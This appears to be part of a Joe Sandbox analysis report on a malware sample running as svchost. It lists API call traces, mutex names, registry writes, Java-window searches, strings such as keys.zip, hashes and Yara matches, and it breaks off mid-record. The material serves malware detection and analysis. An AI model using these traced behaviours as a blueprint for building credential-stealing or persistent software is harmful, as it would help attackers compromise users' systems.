                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 42C1D631A006169FCB15DF68C8A4BBE7BB5EF85318F14C294ED569B340E731AA0DCB90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WindowFromDC.USER32(?), ref: 02C7B39C
                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02C7B3D4
                                                                                                                                                                                                                    • CreateRectRgn.GDI32(00000001,00000001,00000001,00000001), ref: 02C7B3E2
                                                                                                                                                                                                                    • GetClipRgn.GDI32(?,00000000), ref: 02C7B3EC
                                                                                                                                                                                                                    • SelectClipRgn.GDI32(00000000,00000000), ref: 02C7B3FC
                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 02C7B403
                                                                                                                                                                                                                    • GetViewportOrgEx.GDI32(?,?), ref: 02C7B40E
                                                                                                                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 02C7B422
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C7B463
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ClipObjectViewport$CreateDeleteFromMutexRectReleaseSelectSingleWaitWindow
                                                                                                                                                                                                                    • String ID: P0#v
                                                                                                                                                                                                                    • API String ID: 3315380975-3387790918
                                                                                                                                                                                                                    • Opcode ID: cb569ef6b664245f7c3fa50cf9dcfabde7d68aeb19ca8df509e47a00b2190c6b
                                                                                                                                                                                                                    • Instruction ID: fa693be15dccf9b0968d71d7f8b39fe227df8554a4e78187f550de969f190dc2
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cb569ef6b664245f7c3fa50cf9dcfabde7d68aeb19ca8df509e47a00b2190c6b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5941E7B6640245ABCB14CF99DC84EAB77BDEF8C715F108A59FA19D3240D630EC51CBA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf8b2), ref: 02C928D7
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bf8b2,?,?), ref: 02C92969
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214},?,?), ref: 02C929F5
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C92A06
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C92A0D
                                                                                                                                                                                                                      • Part of subcall function 02C93E00: GetHandleInformation.KERNEL32(?,00000000), ref: 02C93E14
                                                                                                                                                                                                                      • Part of subcall function 02C93E00: CloseHandle.KERNEL32(?), ref: 02C93E25
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: BackslashHandleMutexPath$CloseCreateInformationReleaseSleep
                                                                                                                                                                                                                    • String ID: 7f1bf8b2$Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}$P0#v$keys.zip$path.txt
                                                                                                                                                                                                                    • API String ID: 3621236684-2687716975
                                                                                                                                                                                                                    • Opcode ID: d5380504f41b169b9c446815faef5c12e73c5d2c4660a589b03eeaab5e5fcfa9
                                                                                                                                                                                                                    • Instruction ID: 68b0bd38cb0a6921277f2db676b60a575a159409839778f83137e24ce36cf823
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d5380504f41b169b9c446815faef5c12e73c5d2c4660a589b03eeaab5e5fcfa9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1A41E8319445DA5FDB17CB28982C7E6BBE5AF89300F1886D9DCC9DB201DB718A48C791
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C76570: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C76596
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765B7
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765DD
                                                                                                                                                                                                                      • Part of subcall function 02C76570: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,02C86BCC,?,00000000), ref: 02C765E4
                                                                                                                                                                                                                      • Part of subcall function 02C76570: memset.MSVCRT ref: 02C765F4
                                                                                                                                                                                                                      • Part of subcall function 02C76570: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76616
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76622
                                                                                                                                                                                                                      • Part of subcall function 02C76570: HeapValidate.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76629
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,02C86BCC,?), ref: 02C76636
                                                                                                                                                                                                                      • Part of subcall function 02C76570: HeapFree.KERNEL32(00000000,?,?,?,?,?,02C86BCC,?), ref: 02C7663D
                                                                                                                                                                                                                      • Part of subcall function 02C76570: GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C7665D
                                                                                                                                                                                                                      • Part of subcall function 02C76570: CloseHandle.KERNEL32(00000000), ref: 02C7666E
                                                                                                                                                                                                                      • Part of subcall function 02C76570: IsBadWritePtr.KERNEL32(?,00000004), ref: 02C7667E
                                                                                                                                                                                                                    • RtlImageNtHeader.NTDLL(00000000), ref: 02C9386E
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02C93882
                                                                                                                                                                                                                    • GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02C84480), ref: 02C93893
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02C938A3
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C84480), ref: 02C938E0
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,?,02C84480), ref: 02C938E3
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,?,02C84480), ref: 02C938F0
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,?,02C84480), ref: 02C938F3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$FileHandle$FreeValidate$AddressAllocateCloseCountCreateHeaderImageInformationModuleProcReadSizeTickWritememset
                                                                                                                                                                                                                    • String ID: RtlUniform$ntdll.dll
                                                                                                                                                                                                                    • API String ID: 1403775172-3277137149
                                                                                                                                                                                                                    • Opcode ID: 64baa5fd28dc40ee032b274c01d001fef5a3462349e706ef4d6c3eb692cf10ee
                                                                                                                                                                                                                    • Instruction ID: 0ccaee5bb5eef121bf02499105de3754658da8f2b413a91fad157d137fb16431
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 64baa5fd28dc40ee032b274c01d001fef5a3462349e706ef4d6c3eb692cf10ee
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7311B631E842916FEB169BB5DC0DF9BBBACEF84751F0446A5F905D3280DB34D610CAA1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • FindWindowW.USER32(SunAwtFrame,02CB83E0), ref: 02C8EAE1
                                                                                                                                                                                                                    • FindWindowW.USER32(SunAwtFrame,02CB8418), ref: 02C8EAF1
                                                                                                                                                                                                                    • FindWindowW.USER32(SunAwtFrame,02CB8448), ref: 02C8EB01
                                                                                                                                                                                                                    • FindWindowW.USER32(SunAwtFrame,02CB8468), ref: 02C8EB11
                                                                                                                                                                                                                    • FindWindowW.USER32(SunAwtDialog,02CB83E0), ref: 02C8EB21
                                                                                                                                                                                                                    • FindWindowW.USER32(SunAwtDialog,02CB8418), ref: 02C8EB31
                                                                                                                                                                                                                    • FindWindowW.USER32(SunAwtDialog,02CB8448), ref: 02C8EB41
                                                                                                                                                                                                                    • FindWindowW.USER32(SunAwtDialog,02CB8468), ref: 02C8EB51
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FindWindow
                                                                                                                                                                                                                    • String ID: SunAwtDialog$SunAwtFrame
                                                                                                                                                                                                                    • API String ID: 134000473-1757792087
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02C8A32C
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8A335
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8A349
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8A35B
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfc59), ref: 02C8A366
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bfc59,ALPHA), ref: 02C8A380
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C8A386
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                    • String ID: 7f1bfc59$ALPHA$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0#v
                                                                                                                                                                                                                    • API String ID: 4280258085-526467187
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C918FC
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C91905
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C91919
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C9192B
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF8F3), ref: 02C91936
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7F1BF8F3,RFK), ref: 02C91950
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C91956
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                    • String ID: 7F1BF8F3$Local\{EAF777FF-8989-4fe1-9A0D-95CD777C0214}$P0#v$RFK
                                                                                                                                                                                                                    • API String ID: 4280258085-2405295479
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}), ref: 02C8E8BC
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8E8C5
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8E8D9
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8E8EB
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfde3), ref: 02C8E8F6
                                                                                                                                                                                                                    • Sleep.KERNEL32(00009C40,7f1bfde3,HANDY), ref: 02C8E910
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C8E916
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleMutexSleep$BackslashCloseInformationOpenPathRelease
                                                                                                                                                                                                                    • String ID: 7f1bfde3$HANDY$Local\{EAF7eaFF-8989-4fe1-9A0D-95CD777C0214}$P0#v
                                                                                                                                                                                                                    • API String ID: 4280258085-2479272528
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7F114
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 02C7F12C
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7F12F
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 02C7F13C
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7F13F
                                                                                                                                                                                                                    • InternetQueryOptionA.WININET(?,00000022,00000000,-02CBD804), ref: 02C7F15C
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000014), ref: 02C7F179
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C7F180
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7F190
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7F1D5
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,00000000,?), ref: 02C7F1E9
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Processmemset$AllocFreeInternetOptionQueryValidatememcpy
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 3911349929-0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,-0597B008,00000000,00000000,?,?,?,?), ref: 02C7E324
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 02C7E32B
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C7E33B
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 02C7E346
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(?,00000000,00000000,?,?,02CB36B4,?,02CB3DE4,-0597B008,00000000,00000000,?), ref: 02C7E40E
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7E415
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(?,00000000), ref: 02C7E421
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7E428
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,?,?,?,?,?,02CB3DE4,-0597B008,00000000,00000000,?), ref: 02C7E44E
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,-0597B008,00000000,00000000,?,?,?,?), ref: 02C7E47A
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000), ref: 02C7E47D
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02C7E48A
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 02C7E48D
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$Process$FreeValidatememcpy$Allocmemset
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 1948005343-0
                                                                                                                                                                                                                    • Opcode ID: a40c66fdaf0112aab8bbe067be471c51554bc826174dd919857f03d9f0225b0f
                                                                                                                                                                                                                    • Instruction ID: 81e6e9af924028ffee4f43b75ffaa7436fad0c47c8715583036e619129a02199
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a40c66fdaf0112aab8bbe067be471c51554bc826174dd919857f03d9f0225b0f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5261A673B002199BDB11DF99D884AAAB7A9FF88714F0486A5FD0997340D771EE11CBE0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76B83
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76B9B
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,?,?,?,?,?,?,7622F380), ref: 02C76BBC
                                                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,00000104,00000000,00000001,?,00000104,?,?,?,?,?,7622F380), ref: 02C76BE2
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,7622F380), ref: 02C76C6D
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,7622F380), ref: 02C76C74
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76C83
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,?,?,?,7622F380), ref: 02C76CB3
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$Heap$AllocCloseOpenProcessQueryValue
                                                                                                                                                                                                                    • String ID: software\microsoft
                                                                                                                                                                                                                    • API String ID: 4158279268-3673152959
                                                                                                                                                                                                                    • Opcode ID: 90201f7ca9359d800aed87972a28eb2b708b985beff4ee246ce9ad195b8c8ef2
                                                                                                                                                                                                                    • Instruction ID: f00bfaf2064b4f9c923215d3669394f2093518c029f08b413f135ced1ddba1f1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 90201f7ca9359d800aed87972a28eb2b708b985beff4ee246ce9ad195b8c8ef2
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 77410571E4055DAFEB15DB749C88AEAB7ADEF98304F1045A8E549D7140E3708F498BA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76E92
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C76EB0
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(02C84ADF,software\microsoft,00000000,00000102,80000002,?,?,?,?,00000000,0000000A), ref: 02C76F4D
                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(80000002,80f5007ca,00000000,00000001,?,00000104,?,?,?,?,00000000,0000000A), ref: 02C76F6F
                                                                                                                                                                                                                    • RegDeleteValueA.ADVAPI32(80000002,80f5007ca,?,?,?,?,00000000,0000000A), ref: 02C76F7C
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(80000002,?,?,?,?,00000000,0000000A), ref: 02C76F8A
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(80000002,?,?,?,?,00000000,0000000A), ref: 02C76F9F
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Valuememset$CloseDeleteFlushOpen
                                                                                                                                                                                                                    • String ID: 80f5007ca$software\microsoft
                                                                                                                                                                                                                    • API String ID: 3377232977-1722485806
                                                                                                                                                                                                                    • Opcode ID: 9d76e9c25529614b7cb61f11b469bd952ee227bccdab77d5b8f0f35b43d2b7e0
                                                                                                                                                                                                                    • Instruction ID: 3d5aa9a02ba86b7cd17a48e747e0ce21684cc2f9c1aa38b4cea9df250a4d612e
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d76e9c25529614b7cb61f11b469bd952ee227bccdab77d5b8f0f35b43d2b7e0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C31F671A40298AFDB24DB64DC88FEE77BDEF55304F1046A8E586D7140D2B19E848B90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BF8F3), ref: 02C90E37
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,?), ref: 02C90E77
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?), ref: 02C90E81
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C90E89
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C90E9A
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,?), ref: 02C90EA1
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,?), ref: 02C90EAE
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: DirectoryErrorLastPath$AdminBackslashCreateCurrentFolderMakeSystemUser
                                                                                                                                                                                                                    • String ID: 7F1BF8F3$keys.zip
                                                                                                                                                                                                                    • API String ID: 4256651433-778259038
                                                                                                                                                                                                                    • Opcode ID: 4f76909a773524a01a82abfe46ab60e592bd71a00c7721c696f8db1a2e800bef
                                                                                                                                                                                                                    • Instruction ID: 606814422c2f5eaec286f51e3f7223c683517c8e062afb5d9dc1b2dbc34f0057
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4f76909a773524a01a82abfe46ab60e592bd71a00c7721c696f8db1a2e800bef
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF21F8759401D58FCB168B34A96CBE77BEDAF85301F1486D4E9C9CB200DB70C955CBA0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C823A7
                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 02C823B9
                                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(user!226533!1CE3AAD1,software\microsoft,00000000,00000102,02C84A6F,?,02C84A6F), ref: 02C823D3
                                                                                                                                                                                                                    • RegSetValueExA.ADVAPI32(02C84A6F,80F50315a,00000000,00000004,00000004,00000004,02C84A6F), ref: 02C823F0
                                                                                                                                                                                                                    • RegFlushKey.ADVAPI32(?), ref: 02C823FA
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 02C82404
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AdminCloseCountFlushOpenTickUserValue
                                                                                                                                                                                                                    • String ID: 80F50315a$user!226533!1CE3AAD1$software\microsoft
                                                                                                                                                                                                                    • API String ID: 287100044-224011205
                                                                                                                                                                                                                    • Opcode ID: 8f6cdfb92d119de1b8484a46a2feac68937d8403caffc9ce92df36176a82f031
                                                                                                                                                                                                                    • Instruction ID: 3b1379d1164551cb229a6ca7f0a1ba3dadd87f54f5e1a5cc4ea733abf2b871cf
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8f6cdfb92d119de1b8484a46a2feac68937d8403caffc9ce92df36176a82f031
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 60F03C79D80258FBE701DBA0AC4AF9A773CAF04601F104695FE06A3180D670AA159BA5
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000000), ref: 02C7EBEA
                                                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,?,?,?,?,00001100,?,?,?,?,?,?,?,?,?), ref: 02C7EC9A
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C7ECB6
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 02C7ECC5
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,Content-Length,?), ref: 02C7ED1C
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?,?,?,?,?,?,?), ref: 02C7ED3D
                                                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 02C7EDBF
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                             • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$_snprintf
                                                                                                                                                                                                                    • String ID: 0$%x$Content-Length
                                                                                                                                                                                                                    • API String ID: 4125937431-3838797520
                                                                                                                                                                                                                    • Opcode ID: 33af21bc4f9b3d582628b9cae9a83cdf2460a5ddc0ce9f7ac8dce1af683e3ede
                                                                                                                                                                                                                    • Instruction ID: 52476407a82d41700fb536315d3cc800fccaa62d03a276dfe78a9bb67cd9490d
